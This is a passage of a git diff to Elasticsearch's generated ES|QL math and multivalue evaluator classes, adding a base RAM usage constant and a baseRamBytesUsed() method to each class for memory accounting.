a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java index 0e970db07a280..b8d713b16b509 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ScalbConstantLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbConstantLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java index 510f736f55a32..351939e4cfe02 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ScalbIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + baseRamBytesUsed += scaleFactor.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock, IntBlock scaleFactorBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java index 7e24b28332dc3..e0a9847dcfabe 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ScalbLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + baseRamBytesUsed += scaleFactor.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock, LongBlock scaleFactorBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java index 9f73c895b6f42..0bffb5dcde163 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SignumDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java index e6a270c3e344d..0b465adb418ee 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SignumIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java index 35569ecd80476..41697ff774ac7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SignumLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java index 677a8ec1fe6b5..15cd1011c10a4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SignumUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java index 51514290e8254..8cdd34ba8a5f8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SinEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SinEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java index 99a6afb3b1843..4cbd0e4574bf6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SinhEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SinhEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java index 30fa92073cc29..5da23a5272c6b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SqrtDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java index f2e8c3c14bc2b..edd3271ba48f5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SqrtIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java index 040ddae13ce5f..ab14c1d407670 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SqrtLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java index 21d026cb44c07..7d2c5335f0dcf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SqrtUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java index 978d202c7f3ce..c8af90bc9a3d1 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class TanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(TanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java index a7b594d130ba4..bc3b7a4856cab 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class TanhEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(TanhEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java index c126bd7bef196..b77ae1c09167c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock field1Block, BooleanBlock field2Block) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java index 3afd3534b92f6..6ccd1110f74bb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock field1Block, BytesRefBlock field2Block) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java index 315150a20e354..13703a6937c36 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock field1Block, DoubleBlock field2Block) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java index 0291e8c07d9ff..62d28b4609c97 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = 